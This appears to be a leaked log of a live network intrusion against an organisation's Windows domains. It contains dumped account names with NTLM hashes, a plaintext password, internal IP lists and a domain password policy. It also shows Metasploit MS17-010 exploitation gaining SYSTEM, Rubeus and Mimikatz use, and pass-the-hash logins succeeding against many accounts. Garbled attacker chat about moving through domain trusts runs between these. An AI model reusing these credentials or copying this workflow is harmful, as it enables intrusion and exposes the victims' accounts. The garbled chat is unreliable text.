3793 cthiele 9f12a60fe10fce15ceb8ca440e7bda32 66080
1744 j_haasbi 3ae668e7cce8b8e300fe2e8b81ed7393 512
3791 latkinson 7a21990fcd3d759941e45c490f143d5f 544
3801 holson 7a21990fcd3d759941e45c490f143d5f 546
1655 orasst e3853b1f7355a76024e5978553b7e0d8 512
3179 Dcarndt c68dd631d5061b45779948d721716c24 66080
1808 whithrpt c709283b34de77173d0fafef50155632 512
3719 hdomek e0e50b795008b41856709a1d730aded3 66080
2052 tjkeller 775502b4d04a9f0d89d7d9fec9e67b33 66080
1223 mjn 1c0c10d5bc5ecd940fd491dcd67708 66048
3757 rrkester 33e61ce5f2e9cd59910e05b7c08be164 66080
1312 tmmark 01ee5ba08c4c30b61fba9d4cab74b38c 512
1618 mmalsgxr 32338b657b31149f135e177817d92d61 512
3798 tthacker da34b93958c0400f3f09d2ebc7f4cfcc 544
1697 mestuemu bbb4d417ad2061b15ba4b5f19a7bc840 512
1917 clcabrera 60a1eaac00fc84116560ede5db72c2a5 66080
1461 pjmarlot 8c8d459602830c8dc0a961b32a298a8a 66080
3803 haileyolson 51bda3bd385b2fe8e58927e2287f10 544
3629 abashir b5fa34e6c385bf96ca0028adf95128aa 66080
3795 mamunich 63919ea605bf5b36d96b7115af87a96d 66080
1448 drgupta cd16c8e938dd145c40ba9159c9cfb225 66048
3657 mmlee 2556b0a43ec0860d2547b285ac850d63 66080
3799 aemami f0b3802b0629cd85fd862caaeb9e119f 544
3190 klfuchs ad67ef3d1f01f2ce38cd606457e53dce 66080
3271 shanson c12db14a5dee7c993725969810cf5f48 544
3284 koltesa ed28d4db9d6d176ffcebd697d49c2538 544
3713 sanderson 2797fb2bef6849caad893f8ea30efcda 66080
1844 radefelice 06494501ef20b85f6517e1982511e4ac 66048
3722 notto 7fe981532394e2dc8c42c9cbc2a00568 544
3788 echexum 3fceb45f9810ef7ee61bb7aee4f87ff3 66080
1549 klbrummer ff6e02d7831f231a6c1c389d2b903fb1 66080
1807 almqklpt ed41f3390969fa51561c2e2679cdb065 66048
3727 sschmall ad23f058442413fa492a8b9c42722297 66080
1515 djpreston bd893dd5ccb9540c97f1b09f499bc524 512
1352 krheidpt 8d483b8055f2b79a9f83074e545c9321 66080
1754 alkuglmu 176b6ac8c9b3a80b10b9acb5f6420e6c 512
3285 lncunningham 1dea8a82847137ac244cad5157d9095e 66080
1619 kaarndxr 377871bc88640737991a91ee2fb63cb3 512
3792 rerickson b74f6805d5aec51aafccdb10e10d7dc0 66080
1434 sewilde 4164ae41a3d33fa45f88602f17b59e14 512
3283 lapointb 0cfa5bed8c8fbb3435bff603824ea9d 66080
1205 dtbjork 0c47178ff33cba3a38863ec09c60f00e 66048
3804 dlconzemius c2720f7eb4c0ae044b6f784882681d43 66080
3250 bmkraft a0e7c1995ea0d8de8b5936a8e2f4d9c4 544
1887 klkeller 80c8b29db94ed0b30dcd438dfae41a50 512
1466 dmanderson bcd95007ad292aa41e612fe16635cf7c 512
3620 tjmahoney 55c3fc77056307ad7c55f9001bb1be01 66080
1567 dsperr e2ce83b9895bab68023b3f8965d5e413 66080
3149 sacihak bb1ca804e39129284548b4144afa5efc 66080
1696 gelundmu 1f6a957330c98ec9247c1c73de1f1c39 512
3275 wgao 9fd1d13215e778089265d9c77811eaa0 544
2065 kkholland 62bcb945d2f22bd9296305df276fd120 66080
1923 taevavcr 1afbdc5b577af28262d9f9f97091edf5 66080
3774 aaengen 6a36260f41dbfdac767d0838f60ba28b 66080
1945 nolson 0f784ad40710074048e105d508d9c8d86 512
3763 bbartell 44837d1d8ddd2901d5ce7b01679406f2 544
3753 anhunstiger bd9834b1e396f7e5c0a3627abca2b79b 66080
3631 ajevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544
2018 aapeters 78311337e0e3c18802aa4b529a73a4f5 66080
3223 agupta 7b9d0d8a3e343866f174cf100d437339 66080
1796 carrie 7731dfbe3c47eac2765a137982b2338d 512
3779 Sstallman 41ab808371fd0290177402d4b7083414 544
1870 lmrud 4f4a3dbd0923b926a7c5385c68826c5 512
1507 lknutson d8a73e5661f56ccedfe2c291cbf79ab2 512
1658 smlapoor dd90179a47a25d3ff2397d5435c22a19 512
2087 tlbolluyt cff458f1414179962d61696e8ba2fdba 544
3773 ewoodke cd96953d72f3de97cf6fe6f54bb92f9547 544
1216 drlindholm c075a7246f4c8bef9d38a2d3a133bc2f 512
2040 llsiems 8cfde151045c5f9397ac0e226dae041a 544
3195 jsbigelow c8795e154577c9fc3d9474f979332c62 544
1628 rlgragxr f5c80f2d74103e9fa4f159a42c5606e1 512
1413 drtate 01ee5ba08c4c30b61fba9d4cab74b38c 512
3180 rrboesl d5b053724212803becc83dfebc87cca3 66080
1693 kmbugbee f941649e8f47b442b849646d0e9fbda0 66048
3689 adgenereux 80124839fe1e372436e4c7a003ff0841 66080
1552 almanning 890e84ad97cb8d2d1a2196feb89e1aa1 66080
2061 lstage 646a44785b574f9eeb2d6dd39fbc8713 544
1731 d_barkrc f45aac15e69acd4d8f909c616e5792d0 512
1690 ardeutschlander 06ab83fa6bef64787596b2e7dbff7e0e 66048
3255 amandak 8f2e0effefe9ce900f0af39654efb42f 544
3118 scpolzin 090a334bee52ef0af8d15eed4e67860f0 544
1777 smhanson 2f2cc839a042f276010567334733f55b 512
1227 drsamson a1079f9d031a997fd2ce2f5475701de6 512
1171 tjloxtmu 9e74d3d34d49e6255cdf47423971de78 512
3143 mchristianson c549a587fc362d601d0a52492a4f9ad3 66080
1874 drglynn 606824736dd2645664eaf79fc31d1956 512
3243 wjstoll 463689d49c56b5cb9df07713ed9bf349 66080
3768 kmmartin 65a72bbe7eb27d0bdaddb1514bc17f27 66080
3621 jkpetrick 1fff5ccc480ed1c9af0d26f0370670f2 66080
2084 ambell c515d94ca7d4785b385f30b330f5ff26 66080
1299 missyhalvorson 4296577fbc12ebd93e998c7a636696a5 512
3681 cmschnurer adb4a2e8507a8c56d93600d145b6985a 544
1236 eaw 36f8dee2ff0c6e543fd59c047f67c8d2 512
1290 kimborgos 9b71edf13ad0572d0c45e39996c93691 512
3201 fbackman 244604ce957b7db25f7a26d29d782059 66080
3267 stbsmith 2f80cfd4647edf90c3b5c062e19cd953 544
1377 ctlarsen ca7e8ba4c5738e8919e047a67f91a688 512
1222 bem fbd5a20b0af06c7072f66d3e601f5df7 66048
1656 s_hoffor f6ac816feafe9a48d558c5c5c275163b 512
1817 klvillagomez cb07f6a4efd0161ec072c7043ec282af 66048
1620 gib 78cee4448b7f2c765c2e5773b04c9296 66048
3755 mbropes 7dc6c11be7bc7ffde538c61e937a3061 66080
3270 tjerickson c4c9bc11ccdc61ca0fa178335c89f11a 544
3756 ljhegewald 911b036eb67a3c3613aa586389b82df5 544
2043 orthompson 2f0b69177ccfca8ff22d99eb5ad33f7c 66080
1233 drvennerstrom 4fbed754b567cab978731a901070d06f 512
1250 drnoyes f45a632c42d72767bc0bd24cb3738619 512
3794 sjbroadway fec7f2e406f5fcdf259d41c68dd391ee 66080
3226 MRNWKS20$ 3c062810ba76be858c7168c102f017f4 4096
3644 NWKS15$ f4a49d5d5afe33be31b22bbf34c3ffcc16 4096
3279 keddy 4d633061f7446e627fab789452eb001a 66080
1508 amfries 46970abf77cbe0922b0fef23209f6c4b 512
3256 markg ab5058c6d7df4267b8810f2c687c94c5 544
3790 jrtotland 218143d40917d213ef5dd38998ee45e0 544
3123 ksmith f1c0c855344c74f985318e0593ceeafb 66080
1633 jajansxr e863cacd5e1c01a74b3b90fa62614df0 66048
3263 jessicao 062b97e0ef98fb82a9d8751fadf4040e 544
3282 talacey b81b54d6537f63abe40c0bbfe95d9a1a 66080
1520 kjnordick 7a32637f352e6251c468fbce69a16af3 66080
3171 kglanz c74f497e527592c592682cbf43c13907 544
1212 jhorak 6084ae91972fbeb924a2c906bf57c0ab 66048
1888 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 512
3805 tddonahue e4b4f74a11c7849a43c41a1aaaa6d769 544
1502 NSTORE1$ a7ecca7ada2e5e7460be17cd3be17451 4096
2028 MRNSERV0$ 3b7dca99302839049a812e34ee396e30 4128
2027 MRNSERV1$ b6db88adfb0d3292eb81c07aa0be29b 4128
3649 MRNWKS16$ 616d340582257213f48c5a31dc4bbf4f 4096
2032 MRNWKS3$ d84dad55fa5b4e00bd76a763eb794a62 4096
3222 caaase e18ca25635a48c99e81622bed575a0dd 544
3281 dlholzer 35235e5d7c7f4fc6b4b9b20bd644ba7a 544
3132 sjreese 6f712741e060f625db4c79632f6ab668 66080
3647 eeverett d382a68cd4cadfb315e090f0e25fe8 544
1638 klosprxr 4a4113c6269fb6affdc7721171691bfe 512
1527 NWKS16$ 9f05b3181145e48180859495e362189c 4096
3802 lkatkinson f5370a2cb0c74941246b8f314595851b 544
3696 sberg db273ce36efee2d860acdc2a6562a3c0 66080
2044 kjkhaghany 721e94d3c6fb6495f987ae4e9974ed16 66080
3144 clschmidt b99e2e175c81d852b1ee7630c3afe489 544
3665 MRNWKS15$ b72d2ca3ccf02632ebcecc7d0ece2f69 4096
3247 akwalvatne 652fab17e41dd3879b9b9fee393e4d3b 66080
1378 paragon bee6ea7d7368285956f0158844283bb5 66080
2002 scschmid 6e40d6d997a5d7621a3c51f836c2c9f6 512
3184 tbuseth 1a60a6e3a4db305a9cbc8fc4522eed2d 66080
1725 krhammer 8b6ed8f3965da2296f924c4dc7cda017 512
3227 srmabanta 8e9568f4d0e46735f731adcbd02ff3b2 66080
1809 ewleopold b5a372118565ff272d600097181272d5 512
2070 kmochsendorf 65a13a298816a8804ad0e56f6d066052 66080
1370 lmbaez a2c4803d9e45db3c8fea23335f425a3d 66048
3692 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66080
3715 cosborne c5ffa688e2eaf45e3aaddc670d60e924 66080
3695 snordby 7b3690121840a53b82e38c9d84cccd3b 544
1978 sjaday 2aa8d3a2efecf9392bdad316ffe58204 66080
3287 ahmeda a786dde97ed0e8a0dc4b4101b89d0354 544
1985 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048
1623 boscjlxr 60715fe92ab15af8b5a6eb78908eba1e 512
1646 jmstyvxr 249dd04b3c41068af6c58b94c44aaf69 512
3786 alharnisch ee098fd8f7bd73574393966c13570a0086 544
3251 mecker 8908a51e1f8985b7cb9420848c9f46d7 66080
2035 MRNWKS9$ 3c0b0db88bb2d8886cb25f5c68a71e16 4096
3668 LRHC$ 6da3553db64a74927e867700459ec640 2080
1506 jroberts 79828a3a4c96b7970e8211f140636f18 512
3286 herbaughb d827ee57145e0d8eceed6313358511fd 544
1784 sborsgard c18b6543a6eec71f44a94ec05474f792 66048
3258 lindsayw aa6c3883788ac2f71d00f3e5dbbfb35d 544
1629 kmhansxr d66e52a5f21e0d39eb4cef8c6bf05737 512
3213 kpiechowski c59c8922de63bc3c2136a52f4c1c6334 544
3610 wcporter f70d8147f106cee0fc67d4d2e0fc6ecd 66080
1609 klr d23713c8361026ad0a8f710ceeb1c6de 66048
3228 kigriffie 71eb4f33f5b68b91d34c1e56feb72cd9 66080
2034 MRNWKS6$ 4315e02ab31cbadb75deebf29aee3f4c 4096
1965 laspangler f2f30efb3bbe1993d17ddb853d4ad569 512
1644 lbheiden ea69b248b4fb74e5076c4e6085376236 66048
3767 mbsahin 6f18c8d46bee3e37db945fb3f6fb92f3 66080
2086 joanderson 5afdb1e681f188213cb5affb6c79df9d 66080
2030 MRNWKS7$ b96691c586b3657a952ef8ea1da74ac5 4096
2041 jdovergaard b47a066f40ccf1d76fd4000cfaa35d13 66080
3646 mtbenson 6d5b86313752d11db7997a34e12dc0f8 66080
1110 alibe a80fdb8db842a99d87ef3d857f8ddcf1 66048
1108 ali a80fdb8db842a99d87ef3d857f8ddcf1 66048
1642 drorandi 866b8826bfd5fff14c59775e5729bafc 66048
3152 cjedin c21f1b18aaac94f439332acb78ab4532 66080
2036 RADDC01$ ac668ff27865e411e6a3198940ed2b5f 532480
1572 MRNODE1$ 59a564e81ef6c0c37df0d60f8527a6eb 4096
1579 RADDC02$ cbdabc82ea9ee3d8d804ba2b9f89dd04 532480
2024 MRNSTORE0$ b928b07146e0445419dd1699b3cca5e0 4096
3725 abuehring 65be0db2b857963ad796e6e0d0def162 66080
2026 MRDB-CLUSTER$ 15e0f37b3609471f835ae577085e23a0 4128
3677 MRNWKS19$ e21efb05c6ce9ac89c2e7e30dcf49c62 4096
1698 apschrmu 2a6d0812775eb89f6f3077934bcf95f2 512
3183 elynnes a6ca874c62b05d592273dd708ef187d2 544
1797 drmouser b56354d9266cba25422ab15e8547bcf5 512
2102 LRH-DYNACAD$ 4743dfcacb4876815bf14b75f4acf9ae 4096
3269 mrlee b5b7af6574a6f394e855496382cda928 66080
3196 cplindgren dc316faba52608ac3f441c84727feab0 544
1862 rlkaczmarek f5f1b18257325ed5fe2e87d0aaf759e8 512
3260 briannav 107e0ca156a9c8cab7be287dcd41aaec 544
1631 slhighland 2da4bf65438772db6ceb5ff2d409e57d 512
1649 sathomas 8346863b35867cd414e4e3731ea2da4b 512
3114 chmiller a1f79ae5f9a44c0cba0b6c06bd1e1f5c 66080
3262 morganr 1d0b364bc66b6c951599e11c914e7e7d 544
1568 kolson 058405257249b0c11ec365f8a6370982 66048
2029 MRNWKS10$ f658d35e5cecd87b58e87fe7857b1b2f 4096
1453 skerr 323fcf8e029f3231fd4121a3826a20f3 512
3229 mhalsumrain 695d0eefdfabb555707356abede42eef 66080
3694 krogahn 52879cdd1a4b4923e67fd6f4e2cdfe53 66080
3214 thovde 5587afee05c46b510a50d9e466170d34 66080
3264 stephanieb f5aaeeb4c446730ca370dd949c7fb0c3 544
3781 Kmikkelson cece59201cfefd426aab5fb76db4e59c 544
3771 kjschulte ced6be295f37375e1213919fc8e36043 544
1630 kjhatlxr bf4c3092a586df1a9137a4f5737bdc94 512
3261 brandif dcdc950485cb74a73bf4bf80a4101dac 544
1524 alinds ffd6d72372040691add367549b688221 512
3259 ruthj 6759d99e6711980d074fecb45aff5b55 544
1639 j_larsxr 4f7c65775d8bda83d8216bb2091917cf 512
2047 caaffield 92961d60f619b6063bfd2765a679dc82 66080
1548 maolson 85b0a1c1f6f44a83cc75b62dde6f0eaa 512
3199 smartin 75e426efab18059cfa6684258f4a7d3a 66080
1449 atduenow d245b15328227ea8c8307d7aae721a73 512
1575 MRNWKS11$ 29e77d391aa2f097349593368b67cb18 4096
1636 mtkerrxr f902b05bebc3d13fa0187f84a44b0e1c 66048
3137 MRTEST0$ 28c309a1ac3eaa0801839a1e991561b1 4096
3752 mbhintz 207c08a4223d1b19c53eda8e717d5129 66080
1551 crott 5ce23e414589110e9fba3537ae619600 66080
1475 kbaumgartner b348e7647e07f39ef4d706ab455342e6 512
3249 mthovland 75770dd4f66f4ed318db64ad1ce80b0f 544
1550 jeolson 62ff1aee79dada73b838aec7ca3c560f 512
3119 alasmith a8b89435d1634fd4f45bf671d030f11c 66080
2091 lljerger 7cc9ff2da474e85a3e24018222e1ecfe 66080
3202 jsplichal bcafe80cbf6ea2cab1a96a3612c6cf03 544
2098 metungseth d9840a8afed2ee1b85b8c1dce0a3517c 66080
1265 annlewis 47662aed884a95174de29f642ca62727 512
1847 warncmmu e5bee5800f65d4baf2fd1586ed7d91f9 512
1767 drlokken a73a9b3f676a4d888c4a5588b23a5521 512
1117 NSERV4$ d2984a8f64aba5ad5d32826bd079ae32 4096
3160 cbeebe$ 810c09ebbcb1062afb2534ecd6ed7a86 544
2033 MRNWKS8$ e25c5c3af53b8a77d1b02bdf95e04e5e 4096
3272 gasaithambi 605e5c6b40e4761041a2b9e86d8f737b 544
1280 janeshaikoski 8384445ee87621f5ec558039a4631833 512
1230 drwswenson 953f520c1123239f61fafd0729e2d1a7 512
3248 nmholte 6b5bdab1c58aba731f34c5aa9893e239 544
1392 drgutzmer 3f9bfd262caed9b0918ff698f290d982 512
1660 ganoyeor 0cfccc49bb0f47f8765a90dfa47ec2b1 512
3607 ajfolstad fb07bda7eb6eb3fa33c9c9d7450dc19a3 66080
3265 clstevens c0a90aaacfed09136dcabf7540124dc1 66080
1855 mtvukonich 51a9889746fe107c490c30c0372fb1ed 66048
1187 kjrufer 9d264109febd8b4aaec37f3467cd2180 512
3723 hstark db3d0ebebf38ce9c5fb109294ac74eae 66080
2605 jpdinsmore a27cb2e1f9cde5f54f8c23a98e8600b6 66080
2031 MRNWKS5$ f94cf5e2f2c701d33571dc05dc22c1c3 4096
2023 MRNODE0$ e6f7d306302e941d4054d2f64697c775 4096
1576 MRNWKS4$ e2552f80f2a0486087f7250e87827f63 4096
1627 dldulsxr 47a0d7a2228cbe82a7d01204776cafd2 512
3712 kkrog 9de71f50a4cbb09c2e8bf0c21f0d9e67 66080
1199 mdstoesn 8196972a013c829e19ed30d4093a58be 512
3783 jbragland 13852671dbfdaf8f18f5421a04aab22c 66080
1651 jawestxr e666aafcf2ec56a38e12a903bb1778eb 512
3769 shdoesken ce58cc8ec2d8ee3b8588d1f01988ebe6 66080
2001 ndschmid 956d16814a204bb9050b4e1401f3a0ef 512
3289 smjohnson b2f73e099710c5f03524394f7276b01c 544
3735 emonroe bb325c88326c35682915d48170924800 66080
3257 kecian 2f09c790c9569a4e2da502ae93f1234d 544
``The third one I pulled the first two didn't come all of them arrive, but it's something to work with, I wish I could take it out of my hands.
Success: 'LRHC\pdsanderson:922.Hibe' Administrator
```
```
10.10.220.45
10.10.35.9
10.10.34.87
10.5.50.180
10.5.50.192
10.10.34.18
10.10.34.167
10.10.34.59
10.5.50.228
10.10.34.35
10.5.66.105
10.10.35.71
10.10.34.173
10.10.35.65
10.10.35.57
``Now I'm sure I'll be able to do everything) at the two-hopoogle, I'm the only one with an admin - he's a domain user.... not to lock it, so what's the problem::(however
```
The request will be processed at a domain controller for domain ffmg.local.

Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 999
Minimum password length: 4
Length of password history maintained: 3
Lockout threshold: 10
Lockout duration (minutes): 1
Lockout observation window (minutes): 1
The command completed successfully.

````922.Hibe` it will be easier to ping in this trust all cars and pinged passed on ms17[ ](https://mediaeveryone.com/group/lrhc-org?msg=oNfJkCtLxJjXWyW3a) this on other server osprover)))))))dllk does not fly``
There is not enough space on the disk.
        0 file(s) copied.

``Come on,`` you want some laughs?
LRHC\pdsanderson 8a48ebb4e8aadeb8f71b999ba84ab520
``On the second one, however, here```
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 10.5.50.192
rhosts => 10.5.50.192
msf6 auxiliary(admin/smb/ms17_010_command) > exploit

[*] 10.5.50.192:445 - Target OS: Windows 5.1
[*] 10.5.50.192:445 - Filling barrel with fish... done
[*] 10.5.50.192:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.5.50.192:445 - [*] Preparing dynamite...
[*] 10.5.50.192:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.5.50.192:445 - [+] Successfully Leaked Transaction!
[*] 10.5.50.192:445 - [+] Successfully caught fish-in-a-barrel
[*] 10.5.50.192:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.5.50.192:445 - Reading from CONNECTION struct at: 0x8ae943d8
[*] 10.5.50.192:445 - Built a write-what-where primitive...
[+] 10.5.50.192:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.5.50.192:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.50.192:445 - Getting the command output...
[*] 10.5.50.192:445 - Executing cleanup...
[+] 10.5.50.192:445 - Cleanup was successful
[+] 10.5.50.192:445 - Command completed successfully!
[*] 10.5.50.192:445 - Output for "net localgroup administrators":

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
The ``first one didn't go through``ffmg.local
```
[+] 10.5.50.2:445 - Host is probably VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
 
[+] 10.5.50.192:445 - Host is probably VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
 
[+] 10.10.220.45:445 - Host is probably VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
``Rubeus
```
[*] Target Domain : mcklrh.mig
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
 
[*] Target Domain : ffmg.local
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
``````
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[-] 10.10.39.73:445 - Host does NOT appear vulnerable.
```
:zany_face:still trying to get through to the trust? ``
10.10.39.73
CLINICDC.ffmg.local
````ffmg.local\canderson Gt#832!e ``two more comrades will be joining you in a couple of hours,`` that's why I say now I'll look up how to specify the domain in rubus and on the contrary no kerb what rubus finds so it happens then most likely no kerbs in the other two trusts? was the empty file 1kbati what was the output? and with -domain we loaded it in tpshnet so you dropped it on the disk and it bloated?so we already asked them through tactikAl PoVershEl you can ask for the kerb through the innvoc kernelrssinjest so I'll look for it on the gitea I do not even saved such nigdey remember how invoc-kerbom asked for the kerb can ask from trust?) or in rubeus can poll the neighboring domains?so why rubeus here? we have all the hashes from here give hashes @tl2simply rubeus will try to get a token in trust or just a grid pulled? it's not a trust stop even meme search)2003 not pulled:D well, as they say
im іnfirst part[ ](https://mediaeveryone.com/group/lrhc-org?msg=eRYWi5Wg6x3hrAZsx) no, hash is the same for all on mydoc in msf does not come up[ ](https://mediaeveryone.com/group/lrhc-org?msg=X33pSY4icNZ6ieosT) above threw that came up from available LA and DA, and hash hash first part depends on domain, it will let such hash do? screen of command line[ ](https://mediaeveryone.com/group/lrhc-org?msg=S9kX3FAeMYYh4Gdbs) these guys on trust also check the result smblogin?we don't have access to the dc not to say say say[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) in trust[ ](https://mediaeveryone.com/group/lrhc-org?msg=NNGSmc9G4Ry5P9Ese) not so read my mistakea I'm talking about trusts of your input domaintrust is trust current is input as I understanda current trust is your input domain in trustswhat) current trust?no in current or trust? on dc where? after i uploaded and wrote that file 1 kbyte empty create[ ](https://mediaeveryone.com/group/lrhc-org?msg=DiJd8WN9qHwQBDX9P) and its on dc in lA no? yes we uploaded `rlschmidt` i was taking info under it, its not in trusts you drop scripts why? upload them immediately to the question about kerbs is very good so well done took down hell`stexe -b dc=mcklrh,dc=mig -f "(objectcategory=person)" > C:\Standalone\mcklrh_mig_ad_users.txt` command example and the admin under which you took off does not have access to trusts? only i did not work through -hort as i tried yesterdayhost ran cmd from admin and worked off batnik adinfo@user7 hosted in what category? @hosts @uploads ?[ ](https://mediaeveryone.com/group/lrhc-org?msg=pyWba7aHGMXYo8gd2) would not believe the order not cast[ ](https://mediaeveryone.com/group/lrhc-org?msg=hF9NeXsdrJkqW3NSi) so you can not cast[ ](https://mediaeveryone.com/group/lrhc-org?msg=zhkZaHHwvy2xRkCEg) cast where? how did you remove ad infos from the subs? how is it with coba the issue there @migrate [pid]````
Invoke-Mimikatz
````Invoke-PSInject.ps1 ``jyrkwa`` It makes no sense to drop it, if you have kobaInvoke-Kerb creates an empty 1 Kb file in both trastasophos eats everything that drops through vrd also does not let download@tl1 is all adinfo if ches the rest minus`` ``
[*][*] 192.168.254.92:445 - 192.168.254.92:445 - Starting SMB login
 192.168.254.93:445 - 192.168.254.93:445 - Starting SMB login bruteforce
[*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9cc9fe59203df903a5d98f8414',
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15'
[*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3
[*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3',
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf59948388647537549b36ee6ad42e
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PRHADMIN:aad3b435b51404eeaad3b435b51404ee:6cbf59948388647537549b36ee6ad42e'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a9a2165132'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cdw.user01:aad3b435b51404eeaad3b435b51404ee:70c6dad1c8b04eb86f2e10a9a2165132'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\gsnelson:aad3b435b51404eeaad3b435b51404ee:d899502f6f216eb35493afa551999c51
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\nmsapps:aad3b435b51404eeaad3b435b51404ee:4ee914b92d24c2e3fc45de8d41df4cbd'
[+][+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin2:aad3b435b51404eeaad3b435b51404ee:58a6d0022d4a8d3cb892d2ff1754b7aa'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin3:aad3b435b51404eeaad3b435b51404ee:65336cc5f0fb38689a687aabb17f658f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae667d523c'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsService:aad3b435b51404eeaad3b435b51404ee:327db612d1d53ac8477a49ae7d523c'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Pssupport01:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\radmin:aad3b435b51404eeaad3b435b51404ee:9ed5d85f0709fbf0f343bce62851b726'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\TMSXE.Service01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\UCAdmin:aad3b435b51404eeaad3b435b51404ee:1c7c0878a380b6e004f97cd62af6398b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\Administrator:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e967455e5be6425583783b'
